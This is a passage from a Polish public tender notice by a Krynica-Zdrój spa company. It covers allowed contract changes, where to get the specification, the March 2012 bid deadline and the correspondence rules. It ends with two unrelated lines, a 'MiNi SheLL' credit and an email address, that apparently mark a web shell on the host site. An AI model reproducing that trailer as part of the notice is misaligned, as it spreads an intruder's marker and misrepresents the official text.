<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy przewiduje możliwość zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy na następujących warunkach:
3.1. zmiany sposobu realizacji zamówienia oraz jego zwiększenie lub zmniejszenie do 20% całkowitej wartości zamówienia ze względów technicznych, organizacyjnych i osobowych lub ze względu na zasadę gospodarności, celowości i efektywności wydatkowania środków publicznych. 
3.2. rozwiązania umowy wraz z upływem, czasu na jaki została zawarta lub wraz    z wyczerpaniem całkowitej wartości umowy brutto.   
3.3. wypowiedzenia umowy w razie opóźnień w realizacji przedmiotu umowy oraz nie dotrzymania terminów załatwiania reklamacji, a także w innych przypadkach nie wykonania lub nienależytego wykonania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uzdrowisko.krynica.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Krynica - Żegiestów S.A. ul. Nowotarskiego 9/4,33-380 Krynica-Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2012 godzina 11:00, miejsce: Uzdrowisko Krynica - Żegiestów S.A. ul. Nowotarskiego 9/4,33-380 Krynica-Zdrój
sekretariat pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wszelkiego rodzaju oświadczenia, wnioski, zawiadomienia, informacje itp. (dalej, zbiorczo Korespondencja) Zamawiający i Wykonawca przekazują pisemnie. Dopuszcza się przekazywanie informacji faksem i drogą elektroniczną, przy czym każda ze stron na żądanie drugiej ma obowiązek potwierdzić fakt ich otrzymania..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com